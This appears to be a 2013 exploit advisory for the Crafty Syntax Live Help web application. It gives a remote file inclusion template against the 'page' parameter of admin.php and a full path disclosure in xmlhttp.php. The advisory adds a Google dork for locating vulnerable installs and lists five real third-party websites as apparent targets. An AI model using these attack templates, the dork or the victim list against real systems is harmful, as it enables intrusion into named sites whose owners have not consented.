# Exploit Title : Crafty Syntax Live Help <= (2.*.* & 3.*.*) RFI + Path Disclosure
# Date          : 4/19/2013
# Author        : ITTIHACK
# Home          : http://ittihack.com
# Vendor        : http://www.craftysyntax.com
# Download      : http://www.craftysyntax.com/craftysyntax3.4.1.zip
# Version       : 2.* and 3.* , All versions
# Category      : webapps
# Google dork   : NA
# Tested on     : Windows 7 + Apache server
 
# Description   :Crafty Syntax Live Help is a live support application.
         highlighted features include the ability to create your own questions,
         auto inviting visitors, referrer tracking, page tracking.. and more 
                                  

===========================================================================
1) Remote File Include :   admin.php

if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; }

http://localhost/path/admin.php?page=[RFI]

===========================================================================
2) Full Path Disclosure:  xmlhttp.php

Dork: inurl:"/xmlhttp.php" Notice: Undefined index: whattodo in

http://www.roderickrowser.com/livehelp/xmlhttp.php
http://www.rupeemail.net/livehelp/xmlhttp.php
http://www.michaelroselli.com/cslh/xmlhttp.php
http://www.recomende.com/ajuda/xmlhttp.php
http://www.camilodossantos.com.br/suporte/xmlhttp.php